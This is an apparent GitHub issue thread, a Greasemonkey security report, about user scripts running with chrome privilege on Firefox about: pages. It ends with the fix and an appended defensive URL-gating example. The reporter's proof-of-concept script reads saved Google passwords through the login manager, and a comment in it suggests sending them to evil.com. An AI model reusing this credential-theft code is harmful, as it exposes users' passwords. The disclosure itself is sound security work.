User scripts should not have chrome privilege in about: pages #1375

Closed
LouCypher opened this Issue July 13, 2011 · 5 comments

Zulkarnain K.

I found that user scripts run on these about: pages have chrome privileges:

about:
about:addons
about:config
about:crashes
about:memory
about:permissions
about:plugins
about:support

I tried the snippet from https://developer.mozilla.org/en/Using_nsILoginManager#Retrieving_a_password; it worked with a user script run on the above pages.

Steps to reproduce:
1. Enable "greasemonkey.aboutIsGreaseable" in about:config (set it to true)
2. Install this script

// ==UserScript==
// @name            Retrieving passwords via about: pages
// @namespace       http://mozilla.status.net/loucypher
// @include         about:*
// ==/UserScript==

// Login lookup taken from the MDN nsILoginManager example linked above.
var hostname = 'https://www.google.com';
var formSubmitURL = 'https://www.google.com';  // not http://www.example.com/foo/auth.cgi
var httprealm = null;
var username, password;

try {
  // Components (XPCOM) is normally out of reach for a user script; it is
  // reachable here because the about: page the script is injected into
  // is chrome-privileged.
  var myLoginManager = Components.classes["@mozilla.org/login-manager;1"].
                        getService(Components.interfaces.nsILoginManager);
  var logins = myLoginManager.findLogins({}, hostname, formSubmitURL, httprealm);
  var info = "";
  for (var i = 0; i < logins.length; i++) {
    info += logins[i].username + "\n";
    info += logins[i].password + "\n\n";
  }
  //GM_log(info);
  alert(info); // show usernames and passwords for google.com
               // or send to evil.com via XHR (untested)
} catch(ex) {
  // This will only happen if there is no nsILoginManager component class
  //GM_log(ex);
}

Expected result:
User scripts should not have chrome privileges and should not have access to XPCOM.

Actual result:
Displays usernames and passwords (could be worse).

Marti Martz
Martii commented July 13, 2011

Historical issue reference:
#1302

arantius
Collaborator

My initial guess is that it's just running with the principal of the page itself, which is chrome.

I'd be inclined to say that injecting into about: (besides blank) should be completely removed, rather than pref'ed like it is now. It's unsafe even without this bug.

arantius
Collaborator

I've spent over an hour on this, and been unable to come up with a fix (drop chrome privilege) that continues to allow the script to do anything (it just completely blocks access to the chrome-scope document).

Still thinking we should just drop this feature (injecting into about:s besides blank) altogether.

Marti Martz
Martii commented July 22, 2011

Still thinking we should just drop this feature (injecting into about:s besides blank) altogether.

In regards to security I am +1 for this. Moz and other add-ons are starting to create about: entries of their own, and I would really rather not see user.js become a security threat to other add-ons, including the Moz core. We could never really handle all of them, especially if GM isn't aware of them. about:blank had some issues the last time I tested it too, with document.write, but that was a while ago.

Zulkarnain K.

I agree, it should be removed.

arantius closed this issue from commit 80c62e8 on July 25, 2011:

Never run scripts in about: (except blank).
Security related.  Fixes #1375
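The policy of the closing commit, "never run scripts in about: (except blank)", as an added example that is not Greasemonkey's own code and not from anyone in this thread. It puts a privileged-page gate in front of a simplified @include matcher so that even a script declaring `@include about:*` (as the report's proof of concept does) is refused on about:config, about:, and every other about: page, while a bare about:blank still passes. The matcher supports only the `*` wildcard of the @include syntax; the function and parameter names, and the decision to fail closed on unparseable URLs and on about:blank with a query or fragment, are assumptions made for this example.

```javascript
// Added example, not Greasemonkey's own code. Names are assumptions.

// Convert a Greasemonkey-style @include glob ("https://*.example.com/*")
// into an anchored, case-insensitive RegExp. Every regex metacharacter
// except '*' is escaped, so '.' and '?' in a pattern match literally.
function includeGlobToRegExp(glob) {
  const escaped = glob
    .replace(/[.+?^${}()|[\]\\]/g, "\\$&")
    .replace(/\*/g, ".*");
  return new RegExp("^" + escaped + "$", "i");
}

// The privileged-page gate. Any about: URL other than a bare about:blank
// is a chrome-privileged document; a script injected there would run with
// the page's own principal (the bug in this issue), so it is refused no
// matter what the script's @include lines or any pref say.
// Assumption: fail closed on URLs the WHATWG parser rejects, and treat
// about:blank carrying a query or fragment as not being the bare page.
function isPrivilegedAboutUrl(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch (e) {
    return true; // unparseable: refuse rather than guess
  }
  if (parsed.protocol !== "about:") return false;
  const bareBlank =
    parsed.pathname === "blank" && parsed.search === "" && parsed.hash === "";
  return !bareBlank;
}

// Decide whether a script with the given @include/@exclude globs runs on
// url. The gate is checked first so that @include rules never get a vote
// on privileged about: pages.
function shouldRunScript(includes, excludes, url) {
  if (isPrivilegedAboutUrl(url)) return false;
  if (excludes.some((g) => includeGlobToRegExp(g).test(url))) return false;
  return includes.some((g) => includeGlobToRegExp(g).test(url));
}

// Constructed inputs modelled on the report: the proof-of-concept script's
// @include, plus an ordinary site rule to show normal matching is unchanged.
const pocIncludes = ["about:*"];
const siteIncludes = ["https://www.google.com/*"];
const siteExcludes = ["https://www.google.com/mail*"];

const decisions = {
  aboutConfig: shouldRunScript(pocIncludes, [], "about:config"),     // false
  aboutBare:   shouldRunScript(pocIncludes, [], "about:"),           // false
  aboutBlank:  shouldRunScript(pocIncludes, [], "about:blank"),      // true
  siteHit:     shouldRunScript(siteIncludes, [], "https://www.google.com/search"),        // true
  siteMiss:    shouldRunScript(siteIncludes, siteExcludes, "https://www.google.com/mail"), // false
};
console.log(decisions);
```

The matcher alone would happily match about:config against `about:*`; it is the gate, evaluated before any @include rule, that makes the difference, which is why it belongs in the injection path rather than in the pattern syntax.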